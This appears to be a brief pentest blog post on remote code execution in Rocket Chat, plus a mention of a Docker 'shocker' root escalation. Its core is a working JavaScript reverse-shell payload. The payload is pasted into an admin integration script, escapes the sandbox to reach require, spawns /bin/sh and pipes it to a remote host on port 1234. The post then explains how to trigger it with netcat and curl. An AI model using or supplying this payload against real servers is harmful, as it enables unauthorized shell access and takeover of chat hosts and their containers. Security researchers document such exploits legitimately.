hosting image

Pentest Rocket Chat RCE + docker VM PoC read any root file (PRIV esc) shocker

affected script is Rocket Chat

official site :


Situation :

  • log in as mod or admin.

after login in go to INTEGRATION 



choose the active channel ( my case was GENERAL  )



add  a js code for reverse shell 


const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"), 
cp = require("child_process"), 
sh = cp.spawn("/bin/sh", []); 
var client = new net.Socket(); 
client.connect(1234, "XX.XX.XX.XX", function()
{ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); });


activate netcat on the same port and curl the webhook !

and volla, we got reverse shell !

using the following p0c with small edits was able to get root priv


compile it locally and upload it

and yea we got the root ~!

Leave a Reply

Your email address will not be published. Required fields are marked *